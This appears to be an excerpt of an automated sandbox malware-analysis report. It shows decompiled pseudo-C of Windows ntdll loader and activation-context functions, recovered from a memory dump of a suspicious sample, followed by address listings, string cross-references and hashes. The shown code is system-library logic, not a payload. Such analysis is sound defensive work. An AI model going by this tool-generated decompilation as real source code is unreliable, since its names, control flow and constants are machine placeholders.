				intOrPtr _v308;
				intOrPtr _v316;
				void* __ebx;
				void* __edi;
				void* __esi;
				char _t77;
				signed int _t83;
				void* _t85;
				void* _t88;
				signed int _t94;
				signed short _t102;
				char _t113;
				void* _t127;
				char _t137;
				void* _t138;
				intOrPtr _t146;
				void* _t149;
				void* _t150;
				void* _t151;
				void* _t153;
				void* _t154;
				intOrPtr _t158;
				signed int _t160;
				void* _t163;

				_t162 = (_t160 & 0xfffffff8) - 0x124;
				_v8 =  *0x3344b370 ^ (_t160 & 0xfffffff8) - 0x00000124;
				_t137 = 0;
				_v264 = 0;
				_v280 = 0;
				_t163 =  *0x33445d70 - _t137; // 0x0
				if(_t163 != 0) {
					L18:
					_t77 = 0;
					L16:
					_pop(_t149);
					_pop(_t153);
					_pop(_t138);
					return E33394B50(_t77, _t138, _v8 ^ _t162, _t147, _t149, _t153);
				}
				_push( &_v260);
				_push(0);
				_push(0);
				_push( *((intOrPtr*)( *[fs:0x30] + 8)));
				_t150 = 3;
				_push(_t150);
				E3335E580();
				_t154 = 2;
				_t83 =  *(_v280 + 0x5c) & 0x0000ffff;
				if(_t83 != _t150) {
					if(_t83 == _t154) {
						goto L2;
					}
					goto L18;
				}
				L2:
				_push(0x333213b0);
				_push(_t150);
				_push( &_v268);
				_t85 = E33392AB0();
				_t151 = 4;
				if(_t85 >= 0) {
					_push( &_v256);
					_push(0x50);
					_push( &_v92);
					_push(_t154);
					_push(0x33321a88);
					_push(_v268);
					_t88 = E33392B00();
					_push(_v292);
					E33392A80();
					if(_t88 < 0 || _v88 != _t151 || _v84 != _t151 || _v80 <= _t137) {
						_t154 = 2;
						goto L3;
					} else {
						L15:
						_t77 = _t137;
						goto L16;
					}
				}
				L3:
				_push(0x334433b0);
				_push(0x20019);
				_v293 = _t137;
				_push( &_v288);
				_v288 = _t137;
				if(E33392AB0() >= 0) {
					_push( &_v284);
					_push(0x30);
					_push( &_v220);
					_push(_t154);
					_push(_v288);
					_t94 = E33392AF0();
					_push(_v308);
					_t156 = _t94;
					E33392A80();
					_t52 = _t156 + 0x7ffffffb; // 0x7ffffffb
					asm("sbb ecx, ecx");
					_t139 =  ~_t52 & _t94;
					if(( ~_t52 & _t94) < 0 || _v200 == _t137) {
						goto L4;
					} else {
						L26:
						if(L3336DDA0(_t137, _t137, 0x33321a78,  &_v264) >= 0) {
							_t158 = _v264;
							if(E3336CF00(_t139, _t147, _t158, 0x33321a90, _t137,  &_v280, _t137, _v0) < 0 || _v280 == _t137) {
								L3336CD80(_t139, _t158);
								_t137 = 0xc0000139;
							} else {
								asm("ror eax, cl");
								 *0x33445b64 =  *0x7ffe0330 ^ _v280;
								 *0x334468e4 = _t158;
							}
						} else {
							_t137 = 0xc0000135;
						}
						goto L15;
					}
				}
				L4:
				_push(0x33321398);
				_push("true");
				_push( &_v292);
				if(E33392AB0() < 0) {
					L7:
					if(E33373890(_t137,  &_v252) < 0) {
						goto L15;
					}
					_v276 = 0;
					_t102 = (_v252 & 0x0000ffff) + 0x78;
					if(_t102 > 0xfffe) {
						L14:
						E33363B90( &_v252);
						if(_v297 != _t137) {
							goto L26;
						}
						goto L15;
					}
					_t146 =  *0x33445d78; // 0x0
					_t147 = _t102 & 0x0000ffff;
					_t139 = _t146 + 0x180000;
					_v274 = _t102 & 0x0000ffff;
					_t113 = L33365D90(_t146 + 0x180000,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t146 + 0x180000, _t102 & 0x0000ffff);
					_v284 = _t113;
					if(_t113 == 0) {
						goto L14;
					}
					if(E333710D0(_t139,  &_v276,  &_v252) >= 0 && E3335FE40(_t139,  &_v276, L"\\Software\\Policies\\Microsoft\\Windows\\Safer\\CodeIdentifiers") >= 0) {
						_v244 = 0x18;
						_v236 =  &_v276;
						_push( &_v244);
						_push("true");
						_v240 = _t137;
						_push( &_v292);
						_v232 = 0x40;
						_v228 = _t137;
						_v224 = _t137;
						if(E33392AB0() >= 0) {
							_push( &_v284);
							_push(0x50);
							_push( &_v172);
							_push(2);
							_push(0x33321390);
							_push(_v292);
							_t127 = E33392B00();
							_push(_v316);
							E33392A80();
							if(_t127 >= 0 && _v168 == _t151 && _v164 == _t151 && _v160 > 1) {
								_v293 = 1;
							}
						}
					}
					E33363BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t137, _v272);
					goto L14;
				} else {
					_push( &_v284);
					_push(0x50);
					_push( &_v172);
					_push(2);
					_push(0x33321390);
					_push(_v292);
					if(E33392B00() >= 0) {
						if(_v168 == _t151 && _v164 == _t151 && _v160 > 1) {
							_v293 = 1;
							_push( &_v284);
							_push(0x50);
							_push( &_v172);
							_push(2);
							_push(0x33321a80);
							_push(_v292);
							E33392B00();
						}
					}
					_push(_v292);
					E33392A80();
					if(_v297 != _t137) {
						goto L26;
					}
					goto L7;
				}
			}



























































                                                                                                                                                                                  0x3338832a
                                                                                                                                                                                  0x33388337
                                                                                                                                                                                  0x3338833f
                                                                                                                                                                                  0x33388343
                                                                                                                                                                                  0x33388347
                                                                                                                                                                                  0x3338834b
                                                                                                                                                                                  0x33388351
                                                                                                                                                                                  0x33388515
                                                                                                                                                                                  0x33388515
                                                                                                                                                                                  0x333884f7
                                                                                                                                                                                  0x333884fe
                                                                                                                                                                                  0x333884ff
                                                                                                                                                                                  0x33388500
                                                                                                                                                                                  0x3338850b
                                                                                                                                                                                  0x3338850b
                                                                                                                                                                                  0x3338835b
                                                                                                                                                                                  0x33388362
                                                                                                                                                                                  0x33388363
                                                                                                                                                                                  0x33388364
                                                                                                                                                                                  0x33388369
                                                                                                                                                                                  0x3338836a
                                                                                                                                                                                  0x3338836b
                                                                                                                                                                                  0x33388376
                                                                                                                                                                                  0x33388377
                                                                                                                                                                                  0x3338837e
                                                                                                                                                                                  0x3338850f
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3338850f
                                                                                                                                                                                  0x33388384
                                                                                                                                                                                  0x33388384
                                                                                                                                                                                  0x33388389
                                                                                                                                                                                  0x3338838e
                                                                                                                                                                                  0x3338838f
                                                                                                                                                                                  0x33388396
                                                                                                                                                                                  0x33388399
                                                                                                                                                                                  0x333c4eee
                                                                                                                                                                                  0x333c4eef
                                                                                                                                                                                  0x333c4ef8
                                                                                                                                                                                  0x333c4ef9
                                                                                                                                                                                  0x333c4efa
                                                                                                                                                                                  0x333c4eff
                                                                                                                                                                                  0x333c4f03
                                                                                                                                                                                  0x333c4f08
                                                                                                                                                                                  0x333c4f0e
                                                                                                                                                                                  0x333c4f15
                                                                                                                                                                                  0x333c4f38
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333884f5
                                                                                                                                                                                  0x333884f5
                                                                                                                                                                                  0x333884f5
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333884f5
                                                                                                                                                                                  0x333c4f15
                                                                                                                                                                                  0x3338839f
                                                                                                                                                                                  0x3338839f
                                                                                                                                                                                  0x333883a4
                                                                                                                                                                                  0x333883ad
                                                                                                                                                                                  0x333883b1
                                                                                                                                                                                  0x333883b2
                                                                                                                                                                                  0x333883bd
                                                                                                                                                                                  0x333c4f42
                                                                                                                                                                                  0x333c4f43
                                                                                                                                                                                  0x333c4f49
                                                                                                                                                                                  0x333c4f4a
                                                                                                                                                                                  0x333c4f4b
                                                                                                                                                                                  0x333c4f4f
                                                                                                                                                                                  0x333c4f54
                                                                                                                                                                                  0x333c4f58
                                                                                                                                                                                  0x333c4f5a
                                                                                                                                                                                  0x333c4f5f
                                                                                                                                                                                  0x333c4f67
                                                                                                                                                                                  0x333c4f69
                                                                                                                                                                                  0x333c4f6b
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333c4f7b
                                                                                                                                                                                  0x333c4f7b
                                                                                                                                                                                  0x333c4f8e
                                                                                                                                                                                  0x333c5052
                                                                                                                                                                                  0x333c506a
                                                                                                                                                                                  0x333c5093
                                                                                                                                                                                  0x333c5098
                                                                                                                                                                                  0x333c5072
                                                                                                                                                                                  0x333c5080
                                                                                                                                                                                  0x333c5082
                                                                                                                                                                                  0x333c5087
                                                                                                                                                                                  0x333c5087
                                                                                                                                                                                  0x333c4f94
                                                                                                                                                                                  0x333c4f94
                                                                                                                                                                                  0x333c4f94
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333c4f8e
                                                                                                                                                                                  0x333c4f6b
                                                                                                                                                                                  0x333883c3
                                                                                                                                                                                  0x333883c3
                                                                                                                                                                                  0x333883c8
                                                                                                                                                                                  0x333883ce
                                                                                                                                                                                  0x333883db
                                                                                                                                                                                  0x33388413
                                                                                                                                                                                  0x3338841f
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x33388427
                                                                                                                                                                                  0x33388431
                                                                                                                                                                                  0x33388439
                                                                                                                                                                                  0x333884e1
                                                                                                                                                                                  0x333884e6
                                                                                                                                                                                  0x333884ef
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333884ef
                                                                                                                                                                                  0x3338843f
                                                                                                                                                                                  0x33388445
                                                                                                                                                                                  0x33388448
                                                                                                                                                                                  0x33388456
                                                                                                                                                                                  0x3338845e
                                                                                                                                                                                  0x33388463
                                                                                                                                                                                  0x33388469
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3338847c
                                                                                                                                                                                  0x33388495
                                                                                                                                                                                  0x3338849d
                                                                                                                                                                                  0x333884a5
                                                                                                                                                                                  0x333884a6
                                                                                                                                                                                  0x333884ac
                                                                                                                                                                                  0x333884b0
                                                                                                                                                                                  0x333884b1
                                                                                                                                                                                  0x333884b9
                                                                                                                                                                                  0x333884bd
                                                                                                                                                                                  0x333884c8
                                                                                                                                                                                  0x333c4ff3
                                                                                                                                                                                  0x333c4ff4
                                                                                                                                                                                  0x333c4ffd
                                                                                                                                                                                  0x333c4ffe
                                                                                                                                                                                  0x333c5000
                                                                                                                                                                                  0x333c5001
                                                                                                                                                                                  0x333c5005
                                                                                                                                                                                  0x333c500a
                                                                                                                                                                                  0x333c5010
                                                                                                                                                                                  0x333c5017
                                                                                                                                                                                  0x333c5045
                                                                                                                                                                                  0x333c5045
                                                                                                                                                                                  0x333c5017
                                                                                                                                                                                  0x333884c8
                                                                                                                                                                                  0x333884dc
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333883dd
                                                                                                                                                                                  0x333883e1
                                                                                                                                                                                  0x333883e2
                                                                                                                                                                                  0x333883eb
                                                                                                                                                                                  0x333883ec
                                                                                                                                                                                  0x333883ee
                                                                                                                                                                                  0x333883ef
                                                                                                                                                                                  0x333883fa
                                                                                                                                                                                  0x333c4fa5
                                                                                                                                                                                  0x333c4fca
                                                                                                                                                                                  0x333c4fcf
                                                                                                                                                                                  0x333c4fd0
                                                                                                                                                                                  0x333c4fd9
                                                                                                                                                                                  0x333c4fda
                                                                                                                                                                                  0x333c4fdc
                                                                                                                                                                                  0x333c4fe1
                                                                                                                                                                                  0x333c4fe5
                                                                                                                                                                                  0x333c4fe5
                                                                                                                                                                                  0x333c4fa5
                                                                                                                                                                                  0x33388400
                                                                                                                                                                                  0x33388404
                                                                                                                                                                                  0x3338840d
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3338840d

                                                                                                                                                                                  Strings
                                                                                                                                                                                  • LdrpInitializeProcess, xrefs: 33388342
                                                                                                                                                                                  • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 3338847E
                                                                                                                                                                                  • minkernel\ntdll\ldrinit.c, xrefs: 33388341
                                                                                                                                                                                  • @, xrefs: 333884B1
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.11643698870.0000000033320000.00000040.00001000.00020000.00000000.sdmp, Offset: 33320000, based on PE: true
                                                                                                                                                                                  • Associated: 00000002.00000002.11643698870.0000000033449000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.11643698870.000000003344D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_33320000_RFQINL0607_Commerical_list.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                                                                                                                                                  • API String ID: 0-1918872054
                                                                                                                                                                                  • Opcode ID: 59d49e505cbe9ec5fe51a6300c74d8b5a32988c308ee9e1e749c69d2507f28ee
                                                                                                                                                                                  • Instruction ID: f399a7ac6e6f82e33939823c99c7614b324e2fa573128422af15a54dfba2078b
                                                                                                                                                                                  • Opcode Fuzzy Hash: 59d49e505cbe9ec5fe51a6300c74d8b5a32988c308ee9e1e749c69d2507f28ee
                                                                                                                                                                                  • Instruction Fuzzy Hash: 99917A72949345AFE721DF21C880FABBAECEF84385F44892DF685DA151E734C948CB52
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Function 3338265C Relevance: 5.2, Strings: 4, Instructions: 249COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  C-Code - Quality: 84%
                                                                                                                                                                                  			E3338265C(signed char __ecx, signed int __edx, intOrPtr _a4, signed int* _a8, signed int* _a12, signed int* _a16) {
				signed int _v8;
				char _v532;
				signed int _v536;
				signed int _v540;
				signed int _v544;
				char* _v548;
				short _v550;
				short _v552;
				signed int* _v556;
				signed int* _v560;
				signed int* _v564;
				signed int _v568;
				void* __ebx;
				void* __edi;
				void* __esi;
				short _t95;
				intOrPtr _t96;
				void* _t104;
				signed int _t105;
				signed int* _t107;
				void* _t113;
				signed int _t119;
				intOrPtr _t120;
				void* _t121;
				char* _t128;
				void* _t129;
				signed int _t131;
				signed short _t139;
				signed int _t142;
				signed int _t147;
				signed int _t149;
				signed int _t154;

				_t141 = __edx;
				_v8 =  *0x3344b370 ^ _t154;
				_v556 = _a12;
				_t128 =  &_v532;
				_v560 = _a8;
				_t147 = 0;
				_v564 = _a16;
				_t142 = 0;
				_v540 = __ecx;
				_v532 = 0;
				_t131 = 0;
				_v552 = 0;
				_t95 = 2;
				_v550 = _t95;
				_t96 = _a4;
				_v536 = 0;
				_v544 = 0;
				_v548 = _t128;
				if(_t96 == 0x3332120c) {
					E333DEF10(0x33, 0, "SXS: %s() passed the empty activation context\n", "RtlpGetActivationContextDataStorageMapAndRosterHeader");
					_t148 = 0xc000000d;
					L39:
					return E33394B50(_t148, _t128, _v8 ^ _t154, _t141, _t142, _t148);
				}
				if(_v560 != 0) {
					 *_v560 =  *_v560 & 0;
					_t147 = 0;
				}
				if(_v556 != _t131) {
					 *_v556 =  *_v556 & _t131;
					_t147 = _t131;
				}
				if(_v564 != _t131) {
					 *_v564 =  *_v564 & _t142;
					_t131 = _t142;
				}
				if((_v540 & 0xfffffffc) != 0 || _t141 == 0 || _v560 == _t142 || _v556 == _t142) {
					_push(_v556);
					_push(_v560);
					_push(_t141);
					_push(_v540);
					E333DEF10(0x33, 0, "SXS: %s() bad parameters:\nSXS:    Flags                : 0x%lx\nSXS:    Peb                  : %p\nSXS:    ActivationContextData: %p\nSXS:    AssemblyStorageMap   : %p\n", "RtlpGetActivationContextDataStorageMapAndRosterHeader");
					_t148 = 0xc000000d;
					goto L37;
				} else {
					if(_t96 != 0) {
						if(_t96 == 0xfffffffc) {
							L24:
							_t57 = _t141 + 0x200; // 0x230
							_t131 = _t57;
							_t104 =  *_t131;
							_t58 = _t141 + 0x204; // 0x234
							_t147 = _t58;
							_v536 = _t131;
							_v544 = _t147;
							if(_t104 == 0) {
								L33:
								_t105 =  *_t147;
								L34:
								_t141 = _v556;
								 *_v556 = _t105;
								 *_v560 =  *_t131;
								_t107 = _v564;
								if(_t107 != 0) {
									 *_t107 = _t142;
								}
								_t148 = 0;
								L37:
								if(_t128 != 0 && _t128 !=  &_v532) {
									E33363B90( &_v552);
								}
								goto L39;
							}
							_t142 =  *((intOrPtr*)(_t104 + 0x18)) + _t104;
							L26:
							_t141 = 0;
							if( *_t131 != 0 &&  *_t147 == 0) {
								_t108 =  *(_t142 + 8);
								if( *(_t142 + 8) > 0x3ffffffc) {
									_t148 = 0xc0000095;
									goto L37;
								}
								_t129 = L33365D90(_t131,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, 0xc + _t108 * 4);
								if(_t129 == 0) {
									_t148 = 0xc0000017;
									L51:
									_t128 = _v548;
									goto L37;
								}
								_t141 =  *(_t142 + 8);
								_t67 = _t129 + 0xc; // 0xc
								_t113 = E333833D0(_t129,  *(_t142 + 8), _t67);
								_t148 = _t113;
								if(_t113 < 0) {
									E33363BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t129);
									goto L51;
								}
								_t147 = _v544;
								asm("lock cmpxchg [esi], ecx");
								if(0 != 0) {
									E33349303(_t129);
									E33363BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t129);
								}
								_t131 = _v536;
								_t128 = _v548;
							}
							goto L33;
						}
						if((_v540 & 0x00000003) != 0) {
							goto L12;
						}
						_t55 = _t96 + 0x10; // 0x10
						_t131 = _t55;
						_t141 =  *_t131;
						if(_t141 == 0) {
							_t148 = 0xc00000e5;
							goto L39;
						}
						_t142 =  *((intOrPtr*)(_t141 + 0x18)) + _t141;
						_t105 = _t96 + 0x5c;
						goto L34;
					}
					L12:
					if(_t96 == 0xfffffffc || (_v540 & 0x00000002) != 0) {
						goto L24;
					} else {
						if(_t96 != 0) {
							if((_v540 & 0x00000001) == 0) {
								goto L26;
							}
						}
						_t31 = _t141 + 0x1f8; // 0x228
						_t131 = _t31;
						_t119 =  *_t131;
						_t32 = _t141 + 0x1fc; // 0x22c
						_t147 = _t32;
						_v536 = _t131;
						_v544 = _t147;
						if(_t119 == 0) {
							goto L33;
						}
						_t142 =  *((intOrPtr*)(_t119 + 0x18)) + _t119;
						_v568 = _t142;
						if( *_t147 != 0) {
							goto L26;
						}
						_t120 =  *((intOrPtr*)(_t141 + 0x10));
						_t141 = 0x208;
						_t139 =  *(_t120 + 0x38);
						_t142 =  *(_t120 + 0x3c);
						_t149 = _t139 & 0x0000ffff;
						_v540 = _t139;
						_t41 = _t149 + 0xe; // 0x23a
						_t121 = _t41;
						if(_t121 > 0x208) {
							if(_t121 <= 0xfffe) {
								_v550 = _t139 + 0xe;
								_t128 = E33365D60(_t139 + 0x0000000e & 0x0000ffff);
								_v548 = _t128;
								if(_t128 != 0) {
									L19:
									E333988C0(_t128, _t142, _t149);
									_t131 = _v536;
									_v552 = _v540 + 0xc;
									asm("movsd");
									asm("movsd");
									asm("movsd");
									asm("movsw");
									_t142 = _v568;
									_t147 = _v544;
									goto L26;
								}
								_t148 = 0xc0000017;
								goto L39;
							}
							_t148 = 0xc0000106;
							goto L39;
						}
						_t128 =  &_v532;
						_v550 = 0x208;
						_v548 = _t128;
						goto L19;
					}
				}
			}



































                                                                                                                                                                                  0x3338265c
                                                                                                                                                                                  0x3338266e
                                                                                                                                                                                  0x33382675
                                                                                                                                                                                  0x3338267b
                                                                                                                                                                                  0x33382685
                                                                                                                                                                                  0x3338268b
                                                                                                                                                                                  0x33382691
                                                                                                                                                                                  0x33382697
                                                                                                                                                                                  0x3338269b
                                                                                                                                                                                  0x333826a1
                                                                                                                                                                                  0x333826a8
                                                                                                                                                                                  0x333826aa
                                                                                                                                                                                  0x333826b3
                                                                                                                                                                                  0x333826b4
                                                                                                                                                                                  0x333826bb
                                                                                                                                                                                  0x333826be
                                                                                                                                                                                  0x333826c4
                                                                                                                                                                                  0x333826ca
                                                                                                                                                                                  0x333826d5
                                                                                                                                                                                  0x333c1ff1
                                                                                                                                                                                  0x333c1ff9
                                                                                                                                                                                  0x33382906
                                                                                                                                                                                  0x33382916
                                                                                                                                                                                  0x33382916
                                                                                                                                                                                  0x333826e1
                                                                                                                                                                                  0x333826e9
                                                                                                                                                                                  0x333826eb
                                                                                                                                                                                  0x333826eb
                                                                                                                                                                                  0x333826f3
                                                                                                                                                                                  0x333826fb
                                                                                                                                                                                  0x333826fd
                                                                                                                                                                                  0x333826fd
                                                                                                                                                                                  0x33382705
                                                                                                                                                                                  0x3338270d
                                                                                                                                                                                  0x3338270f
                                                                                                                                                                                  0x3338270f
                                                                                                                                                                                  0x3338271b
                                                                                                                                                                                  0x333c20a8
                                                                                                                                                                                  0x333c20ae
                                                                                                                                                                                  0x333c20b4
                                                                                                                                                                                  0x333c20b5
                                                                                                                                                                                  0x333c20c9
                                                                                                                                                                                  0x333c20d1
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x33382741
                                                                                                                                                                                  0x33382743
                                                                                                                                                                                  0x33382813
                                                                                                                                                                                  0x3338283c
                                                                                                                                                                                  0x3338283c
                                                                                                                                                                                  0x3338283c
                                                                                                                                                                                  0x33382842
                                                                                                                                                                                  0x33382844
                                                                                                                                                                                  0x33382844
                                                                                                                                                                                  0x3338284a
                                                                                                                                                                                  0x33382850
                                                                                                                                                                                  0x33382858
                                                                                                                                                                                  0x333828d2
                                                                                                                                                                                  0x333828d2
                                                                                                                                                                                  0x333828d4
                                                                                                                                                                                  0x333828d4
                                                                                                                                                                                  0x333828da
                                                                                                                                                                                  0x333828e4
                                                                                                                                                                                  0x333828e6
                                                                                                                                                                                  0x333828ee
                                                                                                                                                                                  0x333828f0
                                                                                                                                                                                  0x333828f0
                                                                                                                                                                                  0x333828f2
                                                                                                                                                                                  0x333828f4
                                                                                                                                                                                  0x333828f6
                                                                                                                                                                                  0x333c20e2
                                                                                                                                                                                  0x333c20e2
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333828f6
                                                                                                                                                                                  0x3338285d
                                                                                                                                                                                  0x3338285f
                                                                                                                                                                                  0x3338285f
                                                                                                                                                                                  0x33382863
                                                                                                                                                                                  0x33382869
                                                                                                                                                                                  0x33382871
                                                                                                                                                                                  0x333c205d
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333c205d
                                                                                                                                                                                  0x3338288e
                                                                                                                                                                                  0x33382892
                                                                                                                                                                                  0x333c2067
                                                                                                                                                                                  0x333c2080
                                                                                                                                                                                  0x333c2080
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333c2080
                                                                                                                                                                                  0x33382898
                                                                                                                                                                                  0x3338289b
                                                                                                                                                                                  0x333828a1
                                                                                                                                                                                  0x333828a6
                                                                                                                                                                                  0x333828aa
                                                                                                                                                                                  0x333c207b
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333c207b
                                                                                                                                                                                  0x333828b0
                                                                                                                                                                                  0x333828ba
                                                                                                                                                                                  0x333828c0
                                                                                                                                                                                  0x333c208d
                                                                                                                                                                                  0x333c209e
                                                                                                                                                                                  0x333c209e
                                                                                                                                                                                  0x333828c6
                                                                                                                                                                                  0x333828cc
                                                                                                                                                                                  0x333828cc
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x33382863
                                                                                                                                                                                  0x3338281c
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x33382822
                                                                                                                                                                                  0x33382822
                                                                                                                                                                                  0x33382825
                                                                                                                                                                                  0x33382829
                                                                                                                                                                                  0x333c2003
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333c2003
                                                                                                                                                                                  0x33382832
                                                                                                                                                                                  0x33382834
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x33382834
                                                                                                                                                                                  0x33382749
                                                                                                                                                                                  0x3338274c
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3338275f
                                                                                                                                                                                  0x33382761
                                                                                                                                                                                  0x333c2014
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333c201a
                                                                                                                                                                                  0x33382767
                                                                                                                                                                                  0x33382767
                                                                                                                                                                                  0x3338276d
                                                                                                                                                                                  0x3338276f
                                                                                                                                                                                  0x3338276f
                                                                                                                                                                                  0x33382775
                                                                                                                                                                                  0x3338277b
                                                                                                                                                                                  0x33382783
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3338278c
                                                                                                                                                                                  0x33382791
                                                                                                                                                                                  0x33382797
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3338279d
                                                                                                                                                                                  0x333827a0
                                                                                                                                                                                  0x333827a5
                                                                                                                                                                                  0x333827a8
                                                                                                                                                                                  0x333827ab
                                                                                                                                                                                  0x333827ae
                                                                                                                                                                                  0x333827b4
                                                                                                                                                                                  0x333827b4
                                                                                                                                                                                  0x333827b9
                                                                                                                                                                                  0x333c2024
                                                                                                                                                                                  0x333c2033
                                                                                                                                                                                  0x333c2043
                                                                                                                                                                                  0x333c2045
                                                                                                                                                                                  0x333c204d
                                                                                                                                                                                  0x333827d2
                                                                                                                                                                                  0x333827d5
                                                                                                                                                                                  0x333827e8
                                                                                                                                                                                  0x333827ee
                                                                                                                                                                                  0x333827fd
                                                                                                                                                                                  0x333827fe
                                                                                                                                                                                  0x333827ff
                                                                                                                                                                                  0x33382800
                                                                                                                                                                                  0x33382802
                                                                                                                                                                                  0x33382808
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x33382808
                                                                                                                                                                                  0x333c2053
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333c2053
                                                                                                                                                                                  0x333c2026
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333c2026
                                                                                                                                                                                  0x333827bf
                                                                                                                                                                                  0x333827c5
                                                                                                                                                                                  0x333827cc
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333827cc
                                                                                                                                                                                  0x3338274c

                                                                                                                                                                                  Strings
                                                                                                                                                                                  • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 333C1FE3, 333C20BB
                                                                                                                                                                                  • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 333C20C0
                                                                                                                                                                                  • .Local, xrefs: 333827F8
                                                                                                                                                                                  • SXS: %s() passed the empty activation context, xrefs: 333C1FE8
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.11643698870.0000000033320000.00000040.00001000.00020000.00000000.sdmp, Offset: 33320000, based on PE: true
                                                                                                                                                                                  • Associated: 00000002.00000002.11643698870.0000000033449000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.11643698870.000000003344D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_33320000_RFQINL0607_Commerical_list.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                                                                                                                                                  • API String ID: 0-1239276146
                                                                                                                                                                                  • Opcode ID: a2a4d868f7bdde72af0be2410e780494dfec08f97407903df2a3c93a11b96f44
                                                                                                                                                                                  • Instruction ID: b40edb3bd5cc253592020e1459aa96b111ca32c7827ab7a3ba063aeaf8a6a03e
                                                                                                                                                                                  • Opcode Fuzzy Hash: a2a4d868f7bdde72af0be2410e780494dfec08f97407903df2a3c93a11b96f44
                                                                                                                                                                                  • Instruction Fuzzy Hash: FEA1A979D453299BDB20CF64CC84B99B3B4BF58354F1485EAE808EB251DB309E89CF90
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Function 333E327E Relevance: 5.2, Strings: 4, Instructions: 236COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  C-Code - Quality: 72%
                                                                                                                                                                                  			E333E327E(char __ecx, signed int* __edx, intOrPtr* _a4, signed int _a8) {
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				signed int* _v36;
				signed int _v40;
				char _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				char _v68;
				char* _v72;
				short _v74;
				char _v76;
				char* _v80;
				short _v82;
				char _v84;
				signed int* _v100;
				signed int _v104;
				signed int _v108;
				void* _v112;
				signed int* _v116;
				signed int _v120;
				char _v124;
				signed int _v128;
				char _v132;
				intOrPtr _v164;
				signed int _v172;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				short _t76;
				short _t77;
				void* _t78;
				signed char* _t79;
				signed int _t81;
				signed int _t90;
				signed int _t94;
				signed int _t103;
				signed int _t104;
				signed int _t111;
				signed int _t112;
				signed char* _t119;
				signed char* _t126;
				signed int _t129;
				signed int _t130;
				short _t132;
				intOrPtr* _t134;
				signed int _t139;
				signed int* _t144;
				signed char* _t151;
				char _t155;
				signed int _t156;

				_t155 = __ecx;
				_v100 = __edx;
				_t132 = 0x28;
				_t76 = 0x2a;
				_v82 = _t76;
				_t77 = 0x26;
				_v84 = _t132;
				_v80 = L"LdrpResMapFile Enter";
				_v76 = _t77;
				_v74 = _t132;
